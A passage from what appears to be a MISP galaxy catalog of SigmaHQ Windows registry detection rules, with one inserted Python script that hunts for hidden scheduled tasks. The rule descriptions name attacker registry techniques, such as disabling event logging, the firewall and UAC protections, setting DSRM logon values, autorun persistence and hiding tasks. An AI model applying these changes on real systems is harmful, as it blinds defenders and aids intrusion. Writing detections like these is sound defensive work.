| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1562.001'] |
Related clusters
To see the related clusters, click here.
Disable Windows Event Logging Via Registry
Detects tampering with the "Enabled" registry value of a Windows event channel in order to disable logging for that channel
Internal MISP references
UUID 2f78da12-f7c7-430b-8b19-a28f269b77a3 which can be used as unique global reference for Disable Windows Event Logging Via Registry in MISP communities and other software using the MISP galaxy
External references
- https://github.com/DebugPrivilege/CPP/blob/c39d365617dbfbcb01fffad200d52b6239b2918c/Windows%20Defender/RestoreDefenderConfig.cpp - webarchive
- https://twitter.com/WhichbufferArda/status/1543900539280293889 - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_winevt_logging.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | frack113, Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2022-07-04 |
| falsepositive | ['Rare falsepositives may occur from legitimate administrators disabling specific event log for troubleshooting'] |
| filename | registry_set_disable_winevt_logging.yml |
| level | high |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1562.002'] |
Related clusters
To see the related clusters, click here.
Potential WerFault ReflectDebugger Registry Value Abuse
Detects potential WerFault "ReflectDebugger" registry value abuse for persistence.
Internal MISP references
UUID 0cf2e1c6-8d10-4273-8059-738778f981ad which can be used as unique global reference for Potential WerFault ReflectDebugger Registry Value Abuse in MISP communities and other software using the MISP galaxy
External references
- https://cocomelonc.github.io/malware/2022/11/02/malware-pers-18.html - webarchive
- https://www.hexacorn.com/blog/2018/08/31/beyond-good-ol-run-key-part-85/ - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_reflectdebugger.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | X__Junior |
| creation_date | 2023-05-18 |
| falsepositive | ['Unknown'] |
| filename | registry_set_persistence_reflectdebugger.yml |
| level | high |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1036.003'] |
Related clusters
To see the related clusters, click here.
Winlogon AllowMultipleTSSessions Enable
Detects when the 'AllowMultipleTSSessions' value is enabled, which allows multiple Remote Desktop sessions to be open at once. Attackers often use this to connect to an RDP session without disconnecting the other logged-on users
Internal MISP references
UUID f7997770-92c3-4ec9-b112-774c4ef96f96 which can be used as unique global reference for Winlogon AllowMultipleTSSessions Enable in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2022-09-09 |
| falsepositive | ['Legitimate use of the multi session functionality'] |
| filename | registry_set_winlogon_allow_multiple_tssessions.yml |
| level | medium |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.persistence', 'attack.defense-evasion', 'attack.t1112'] |
Related clusters
To see the related clusters, click here.
Registry Persistence via Service in Safe Mode
Detects the modification of the registry to allow a driver or service to persist in Safe Mode.
Internal MISP references
UUID 1547e27c-3974-43e2-a7d7-7f484fb928ec which can be used as unique global reference for Registry Persistence via Service in Safe Mode in MISP communities and other software using the MISP galaxy
External references
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-34---windows-add-registry-value-to-load-service-in-safe-mode-with-network - webarchive
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-33---windows-add-registry-value-to-load-service-in-safe-mode-without-network - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_add_load_service_in_safe_mode.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | frack113 |
| creation_date | 2022-04-04 |
| falsepositive | ['Unknown'] |
| filename | registry_set_add_load_service_in_safe_mode.yml |
| level | high |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1564.001'] |
Related clusters
To see the related clusters, click here.
ScreenSaver Registry Key Set
Detects the registry value set after a masqueraded .scr file is executed via Rundll32 through desk.cpl
Internal MISP references
UUID 40b6e656-4e11-4c0c-8772-c1cc6dae34ce which can be used as unique global reference for ScreenSaver Registry Key Set in MISP communities and other software using the MISP galaxy
External references
- https://jstnk9.github.io/jstnk9/research/InstallScreenSaver-SCR-files - webarchive
- https://twitter.com/pabraeken/status/998627081360695297 - webarchive
- https://twitter.com/VakninHai/status/1517027824984547329 - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_scr_file_executed_by_rundll32.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Jose Luis Sanchez Martinez (@Joseliyo_Jstnk) |
| creation_date | 2022-05-04 |
| falsepositive | ['Legitimate use of screen saver'] |
| filename | registry_set_scr_file_executed_by_rundll32.yml |
| level | medium |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1218.011'] |
Related clusters
To see the related clusters, click here.
ETW Logging Disabled For SCM
Detects changes to the "TracingDisabled" value made in order to disable ETW tracing for services.exe (the Service Control Manager, SCM)
Internal MISP references
UUID 4f281b83-0200-4b34-bf35-d24687ea57c2 which can be used as unique global reference for ETW Logging Disabled For SCM in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2022-12-09 |
| falsepositive | ['Unknown'] |
| filename | registry_set_services_etw_tamper.yml |
| level | low |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.persistence', 'attack.defense-evasion', 'attack.t1112', 'attack.t1562'] |
Related clusters
To see the related clusters, click here.
Potential Signing Bypass Via Windows Developer Features - Registry
Detects the enablement of developer features such as "Developer Mode" or "Application Sideloading", which allows the user to install untrusted packages.
Internal MISP references
UUID b110ebaf-697f-4da1-afd5-b536fa27a2c1 which can be used as unique global reference for Potential Signing Bypass Via Windows Developer Features - Registry in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2023-01-12 |
| falsepositive | ['Unknown'] |
| filename | registry_set_turn_on_dev_features.yml |
| level | high |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.defense-evasion'] |
Disable Internal Tools or Feature in Registry
Detects registry modifications that change features of internal Windows tools (malware such as Agent Tesla uses this technique)
Internal MISP references
UUID e2482f8d-3443-4237-b906-cc145d87a076 which can be used as unique global reference for Disable Internal Tools or Feature in Registry in MISP communities and other software using the MISP galaxy
External references
- https://www.malwarebytes.com/blog/detections/pum-optional-nodispbackgroundpage - webarchive
- https://blogs.vmware.com/security/2022/11/batloader-the-evasive-downloader-malware.html - webarchive
- https://www.malwarebytes.com/blog/detections/pum-optional-nodispcpl - webarchive
- https://bazaar.abuse.ch/sample/7bde840c7e8c36dce4c3bac937bcf39f36a6f118001b406bfbbc25451ce44fb4/ - webarchive
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md - webarchive
- https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_function_user.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | frack113, Nasreddine Bencherchali (Nextron Systems), CrimpSec |
| creation_date | 2022-03-18 |
| falsepositive | ['Legitimate admin script'] |
| filename | registry_set_disable_function_user.yml |
| level | medium |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.persistence', 'attack.defense-evasion', 'attack.t1112'] |
Related clusters
To see the related clusters, click here.
UAC Bypass Abusing Winsat Path Parsing - Registry
Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)
Internal MISP references
UUID 6597be7b-ac61-4ac8-bef4-d3ec88174853 which can be used as unique global reference for UAC Bypass Abusing Winsat Path Parsing - Registry in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Christian Burkard (Nextron Systems) |
| creation_date | 2021-08-30 |
| falsepositive | ['Unknown'] |
| filename | registry_set_uac_bypass_winsat.yml |
| level | high |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.privilege-escalation', 'attack.t1548.002'] |
Related clusters
To see the related clusters, click here.
Disable Windows Security Center Notifications
Detects the UseActionCenterExperience value being set to 0, which disables Windows Security Center notifications
Internal MISP references
UUID 3ae1a046-f7db-439d-b7ce-b8b366b81fa6 which can be used as unique global reference for Disable Windows Security Center Notifications in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | frack113 |
| creation_date | 2022-08-19 |
| falsepositive | ['Unknown'] |
| filename | registry_set_disable_security_center_notifications.yml |
| level | medium |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.persistence', 'attack.defense-evasion', 'attack.t1112'] |
Related clusters
To see the related clusters, click here.
Disable Privacy Settings Experience in Registry
Detects registry modifications that disable Privacy Settings Experience
Internal MISP references
UUID 0372e1f9-0fd2-40f7-be1b-a7b2b848fa7b which can be used as unique global reference for Disable Privacy Settings Experience in Registry in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | frack113 |
| creation_date | 2022-10-02 |
| falsepositive | ['Legitimate admin script'] |
| filename | registry_set_disable_privacy_settings_experience.yml |
| level | medium |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1562.001'] |
Related clusters
To see the related clusters, click here.
Hide Schedule Task Via Index Value Tamper
Detects modification of the "Index" value of a scheduled task in the registry, which effectively hides the task from tooling such as "schtasks /query" (read the referenced link for more information about the effects of this technique)
Internal MISP references
UUID 5b16df71-8615-4f7f-ac9b-6c43c0509e61 which can be used as unique global reference for Hide Schedule Task Via Index Value Tamper in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2022-08-26 |
| falsepositive | ['Unlikely'] |
| filename | registry_set_hide_scheduled_task_via_index_tamper.yml |
| level | high |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1562'] |
Related clusters
To see the related clusters, click here.
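Because a task hidden this way no longer appears in `schtasks /query`, the practical response is to read the TaskCache registry subtree directly rather than ask the scheduler. The following Python is an added example, not the SigmaHQ rule code: it implements the event check for an Index value set to 0, and a hunt over a snapshot of `TaskCache\Tree` and `TaskCache\Tasks` that reports such tasks. The snapshot is a constructed dictionary rather than the live registry, so it runs offline. The Index check is the technique described above; the missing-SD and orphaned-GUID checks go beyond the page's rule and are included here as related hunts, on the assumption that every legitimate task has both a Tree entry with an SD value and a matching Tasks entry.

```python
"""Hunt for scheduled tasks hidden by tampering with TaskCache registry entries.

Added example; not the SigmaHQ rule code. Operates on a constructed snapshot
of HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache
(Tree and Tasks subkeys) instead of the live registry. Index=0 is the page's
technique; the SD and orphan checks are additional hunts (assumption: every
legitimate task has a Tree entry with an SD value and a matching Tasks entry).
"""

TASKCACHE = "hklm\\software\\microsoft\\windows nt\\currentversion\\schedule\\taskcache\\"


def is_index_tamper_event(event):
    """Equivalent of the page's registry_set rule: Tree\\<task>\\Index set to DWORD 0."""
    target = event["TargetObject"].lower()
    return (target.startswith(TASKCACHE + "tree\\")
            and target.endswith("\\index")
            and event["Details"] == "DWORD (0x00000000)")


def find_hidden_tasks(tree, tasks):
    """
    tree:  {task_path: {"Id": "{GUID}", "Index": int, "SD": bytes}}   (TaskCache\\Tree)
    tasks: {"{GUID}": {"Path": task_path, ...}}                        (TaskCache\\Tasks)
    Returns [(task_path, reason)] in discovery order.
    """
    findings = []
    known_ids = set()
    for path, values in tree.items():
        task_id = values.get("Id")
        known_ids.add(task_id)
        if values.get("Index") == 0:
            findings.append((path, "Index is 0: hidden from schtasks /query and the Task Scheduler UI"))
        if "SD" not in values:
            findings.append((path, "SD (security descriptor) value missing: task not listed by the scheduler"))
        if task_id not in tasks:
            findings.append((path, "Tree entry has no matching Tasks\\{GUID} entry"))
    for task_id, values in tasks.items():
        if task_id not in known_ids:
            findings.append((values.get("Path", task_id), "Tasks entry has no Tree entry (orphaned definition)"))
    return findings


# Constructed snapshot (GUIDs and task names are made up; SD bytes are a stub).
SAMPLE_TREE = {
    "\\Microsoft\\Windows\\Defrag\\ScheduledDefrag":
        {"Id": "{11111111-1111-1111-1111-111111111111}", "Index": 3, "SD": b"\x01\x00\x04\x80"},
    "\\Updater":
        {"Id": "{22222222-2222-2222-2222-222222222222}", "Index": 0, "SD": b"\x01\x00\x04\x80"},
    "\\Microsoft\\Windows\\Telemetry\\Sync":
        {"Id": "{33333333-3333-3333-3333-333333333333}", "Index": 3},   # SD deleted
}
SAMPLE_TASKS = {
    "{11111111-1111-1111-1111-111111111111}": {"Path": "\\Microsoft\\Windows\\Defrag\\ScheduledDefrag"},
    "{22222222-2222-2222-2222-222222222222}": {"Path": "\\Updater"},
    "{33333333-3333-3333-3333-333333333333}": {"Path": "\\Microsoft\\Windows\\Telemetry\\Sync"},
    "{44444444-4444-4444-4444-444444444444}": {"Path": "\\Cleanup"},   # no Tree entry at all
}

if __name__ == "__main__":
    for path, reason in find_hidden_tasks(SAMPLE_TREE, SAMPLE_TASKS):
        print(f"{path}: {reason}")
```

On a live host the same two dictionaries can be filled from the registry with `winreg` under an elevated prompt; the point of the snapshot form is that the comparison logic is testable without one.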
Suspicious Shim Database Patching Activity
Detects installation of new shim databases that try to patch sections of known processes for potential process injection or persistence.
Internal MISP references
UUID bf344fea-d947-4ef4-9192-34d008315d3a which can be used as unique global reference for Suspicious Shim Database Patching Activity in MISP communities and other software using the MISP galaxy
External references
- https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/pillowmint-fin7s-monkey-thief/ - webarchive
- https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_shim_database_susp_application.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2023-08-01 |
| falsepositive | ['Unknown'] |
| filename | registry_set_persistence_shim_database_susp_application.yml |
| level | high |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.privilege-escalation', 'attack.persistence', 'attack.t1546.011'] |
Related clusters
To see the related clusters, click here.
Lolbas OneDriveStandaloneUpdater.exe Proxy Download
Detects setting a custom URL for OneDriveStandaloneUpdater.exe to download a file from the Internet without executing any anomalous executables with suspicious arguments. The downloaded file will be in C:\Users\<user>\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\PreSignInSettingsConfig.json
Internal MISP references
UUID 3aff0be0-7802-4a7e-a4fa-c60c74bc5e1d which can be used as unique global reference for Lolbas OneDriveStandaloneUpdater.exe Proxy Download in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | frack113 |
| creation_date | 2022-05-28 |
| falsepositive | ['Unknown'] |
| filename | registry_set_lolbin_onedrivestandaloneupdater.yml |
| level | high |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.command-and-control', 'attack.t1105'] |
Related clusters
To see the related clusters, click here.
Wow6432Node Windows NT CurrentVersion Autorun Keys Modification
Detects modification of autostart extensibility point (ASEP) in registry.
Internal MISP references
UUID 480421f9-417f-4d3b-9552-fd2728443ec8 which can be used as unique global reference for Wow6432Node Windows NT CurrentVersion Autorun Keys Modification in MISP communities and other software using the MISP galaxy
External references
- https://learn.microsoft.com/en-us/sysinternals/downloads/autoruns - webarchive
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md - webarchive
- https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_wow6432node_currentversion.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) |
| creation_date | 2019-10-25 |
| falsepositive | ['Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason', 'Legitimate administrator sets up autorun keys for legitimate reason'] |
| filename | registry_set_asep_reg_keys_modification_wow6432node_currentversion.yml |
| level | medium |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.privilege-escalation', 'attack.persistence', 'attack.t1547.001'] |
Related clusters
To see the related clusters, click here.
UAC Secure Desktop Prompt Disabled
Detects when an attacker tries to change the User Account Control (UAC) elevation request destination via the "PromptOnSecureDesktop" value. The "PromptOnSecureDesktop" setting specifically determines whether UAC prompts are displayed on the secure desktop. The secure desktop is a separate desktop environment that is isolated from other processes running on the system. It is designed to prevent malicious software from intercepting or tampering with UAC prompts. When "PromptOnSecureDesktop" is set to 0, UAC prompts are displayed on the user's current desktop instead of the secure desktop. This reduces the level of security because it potentially exposes the prompts to manipulation by malicious software.
Internal MISP references
UUID 0d7ceeef-3539-4392-8953-3dc664912714 which can be used as unique global reference for UAC Secure Desktop Prompt Disabled in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | frack113 |
| creation_date | 2024-05-10 |
| falsepositive | ['Unknown'] |
| filename | registry_set_uac_disable_secure_desktop_prompt.yml |
| level | medium |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.privilege-escalation', 'attack.defense-evasion', 'attack.t1548.002'] |
Related clusters
To see the related clusters, click here.
Common Autorun Keys Modification
Detects modification of an autostart extensibility point (ASEP) in the registry.
Internal MISP references
UUID f59c3faf-50f3-464b-9f4c-1b67ab512d99 which can be used as unique global reference for Common Autorun Keys Modification in MISP communities and other software using the MISP galaxy
External references
- https://learn.microsoft.com/en-us/sysinternals/downloads/autoruns - webarchive
- https://persistence-info.github.io/Data/userinitmprlogonscript.html - webarchive
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md - webarchive
- https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_common.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split), wagga (name) |
| creation_date | 2019-10-25 |
| falsepositive | ['Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason', 'Legitimate administrator sets up autorun keys for legitimate reason'] |
| filename | registry_set_asep_reg_keys_modification_common.yml |
| level | medium |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.privilege-escalation', 'attack.persistence', 'attack.t1547.001'] |
Related clusters
To see the related clusters, click here.
Suspicious Space Characters in TypedPaths Registry Path - FileFix
Detects the occurrence of numerous space characters in TypedPaths registry paths, which may indicate execution via phishing lures using file-fix techniques to hide malicious commands.
Internal MISP references
UUID 8f2a5c3d-9e4b-4a7c-8d1f-2e5a6b9c3d7e which can be used as unique global reference for Suspicious Space Characters in TypedPaths Registry Path - FileFix in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Swachchhanda Shrawan Poudel (Nextron Systems) |
| creation_date | 2025-11-04 |
| falsepositive | ['Unlikely'] |
| filename | registry_set_susp_typedpaths_space_characters.yml |
| level | high |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.execution', 'attack.t1204.004', 'attack.defense-evasion', 'attack.t1027.010'] |
Related clusters
To see the related clusters, click here.
Session Manager Autorun Keys Modification
Detects modification of an autostart extensibility point (ASEP) in the registry.
Internal MISP references
UUID 046218bd-e0d8-4113-a3c3-895a12b2b298 which can be used as unique global reference for Session Manager Autorun Keys Modification in MISP communities and other software using the MISP galaxy
External references
- https://learn.microsoft.com/en-us/sysinternals/downloads/autoruns - webarchive
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md - webarchive
- https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_session_manager.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) |
| creation_date | 2019-10-25 |
| falsepositive | ['Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason', 'Legitimate administrator sets up autorun keys for legitimate reason'] |
| filename | registry_set_asep_reg_keys_modification_session_manager.yml |
| level | medium |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.privilege-escalation', 'attack.persistence', 'attack.t1547.001', 'attack.t1546.009'] |
Related clusters
To see the related clusters, click here.
Displaying Hidden Files Feature Disabled
Detects modifications to the "Hidden" and "ShowSuperHidden" explorer registry values in order to disable showing of hidden files and system files. This technique is abused by several malware families to hide their files from normal users.
Internal MISP references
UUID 5a5152f1-463f-436b-b2f5-8eceb3964b42 which can be used as unique global reference for Displaying Hidden Files Feature Disabled in MISP communities and other software using the MISP galaxy
External references
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.001/T1564.001.md#atomic-test-8---hide-files-through-registry - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_hide_file.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | frack113 |
| creation_date | 2022-04-02 |
| falsepositive | ['Unknown'] |
| filename | registry_set_hide_file.yml |
| level | medium |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1564.001'] |
Related clusters
To see the related clusters, click here.
Directory Service Restore Mode (DSRM) Registry Value Tampering
Detects changes to the "DsrmAdminLogonBehavior" registry value. During a Domain Controller (DC) promotion, administrators create a Directory Services Restore Mode (DSRM) local administrator account with a password that rarely changes. The DSRM account is an “Administrator” account that logs in with the DSRM mode when the server is booting up to restore AD backups or recover the server from a failure. Attackers could abuse the DSRM account to maintain their persistence and access to the organization's Active Directory. If the "DsrmAdminLogonBehavior" value is set to "0", the administrator account can only be used if the DC starts in DSRM. If the "DsrmAdminLogonBehavior" value is set to "1", the administrator account can only be used if the local AD DS service is stopped. If the "DsrmAdminLogonBehavior" value is set to "2", the administrator account can always be used.
Internal MISP references
UUID b61e87c0-50db-4b2e-8986-6a2be94b33b0 which can be used as unique global reference for Directory Service Restore Mode (DSRM) Registry Value Tampering in MISP communities and other software using the MISP galaxy
External references
- https://www.sentinelone.com/blog/detecting-dsrm-account-misconfigurations/ - webarchive
- https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/dsrm-credentials - webarchive
- https://adsecurity.org/?p=1785 - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_dsrm_tampering.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nischal Khadgi |
| creation_date | 2024-07-11 |
| falsepositive | ['Unknown'] |
| filename | registry_set_dsrm_tampering.yml |
| level | high |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.credential-access', 'attack.persistence', 'attack.t1556'] |
Related clusters
To see the related clusters, click here.
Microsoft Office Protected View Disabled
Detects changes to the Microsoft Office Protected View registry keys with which an attacker disables this feature.
Internal MISP references
UUID a5c7a43f-6009-4a8c-80c5-32abf1c53ecc which can be used as unique global reference for Microsoft Office Protected View Disabled in MISP communities and other software using the MISP galaxy
External references
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md - webarchive
- https://admx.help/HKCU/software/policies/microsoft/office/16.0/excel/security/protectedview - webarchive
- https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/ - webarchive
- https://yoroi.company/research/cyber-criminal-espionage-operation-insists-on-italian-manufacturing/ - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_office_disable_protected_view_features.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | frack113, Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2021-06-08 |
| falsepositive | ['Unlikely'] |
| filename | registry_set_office_disable_protected_view_features.yml |
| level | high |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1562.001'] |
Related clusters
To see the related clusters, click here.
Winlogon Notify Key Logon Persistence
Adversaries may abuse features of Winlogon to execute DLLs and/or executables when a user logs in. Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete.
Internal MISP references
UUID bbf59793-6efb-4fa1-95ca-a7d288e52c88 which can be used as unique global reference for Winlogon Notify Key Logon Persistence in MISP communities and other software using the MISP galaxy
External references
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.004/T1547.004.md#atomic-test-3---winlogon-notify-key-logon-persistence---powershell - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_winlogon_notify_key.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | frack113 |
| creation_date | 2021-12-30 |
| falsepositive | ['Unknown'] |
| filename | registry_set_winlogon_notify_key.yml |
| level | high |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.privilege-escalation', 'attack.persistence', 'attack.t1547.004'] |
Related clusters
To see the related clusters, click here.
Enable Local Manifest Installation With Winget
Detects changes to the AppInstaller (winget) policy, specifically the activation of local manifest installation, which allows a user to install new packages via custom manifests.
Internal MISP references
UUID fa277e82-9b78-42dd-b05c-05555c7b6015 which can be used as unique global reference for Enable Local Manifest Installation With Winget in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2023-04-17 |
| falsepositive | ['Administrators or developers might enable this for testing purposes or to install custom private packages'] |
| filename | registry_set_winget_enable_local_manifest.yml |
| level | medium |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.persistence'] |
Suspicious Environment Variable Has Been Registered
Detects the creation of user-specific or system-wide environment variables via the registry whose values contain suspicious commands and strings.
Internal MISP references
UUID 966315ef-c5e1-4767-ba25-fce9c8de3660 which can be used as unique global reference for Suspicious Environment Variable Has Been Registered in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2022-12-20 |
| falsepositive | ['Unknown'] |
| filename | registry_set_suspicious_env_variables.yml |
| level | high |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.persistence'] |
Disable Windows Firewall by Registry
Detects setting EnableFirewall to 0 to disable the Windows firewall.
Internal MISP references
UUID e78c408a-e2ea-43cd-b5ea-51975cf358c0 which can be used as unique global reference for Disable Windows Firewall by Registry in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | frack113 |
| creation_date | 2022-08-19 |
| falsepositive | ['Unknown'] |
| filename | registry_set_disable_windows_firewall.yml |
| level | medium |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1562.004'] |
Related clusters
To see the related clusters, click here.
Default RDP Port Changed to Non Standard Port
Detects changes to the default RDP port. Remote desktop is a common feature in operating systems. It allows a user to log into a remote system using an interactive session with a graphical user interface. Microsoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS).
Internal MISP references
UUID 509e84b9-a71a-40e0-834f-05470369bd1e which can be used as unique global reference for Default RDP Port Changed to Non Standard Port in MISP communities and other software using the MISP galaxy
External references
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.001/T1021.001.md#atomic-test-1---rdp-to-domaincontroller - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_change_rdp_port.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | frack113 |
| creation_date | 2022-01-01 |
| falsepositive | ['Unknown'] |
| filename | registry_set_change_rdp_port.yml |
| level | high |
| logsource.category | registry_set |
| logsource.product | windows |
| tags | ['attack.privilege-escalation', 'attack.persistence', 'attack.t1547.010'] |
Related clusters
To see the related clusters, click here.
NET NGenAssemblyUsageLog Registry Key Tamper
Detects changes to the NGenAssemblyUsageLog registry key. The .NET Usage Log output location can be controlled by setting the NGenAssemblyUsageLog CLR configuration knob in the Registry or by configuring an environment variable (as described in the next section). By simply specifying an arbitrary value (e.g. a fake output location or junk data) for the expected value, a Usage Log file for the .NET execution context will not be created.
Internal MISP references
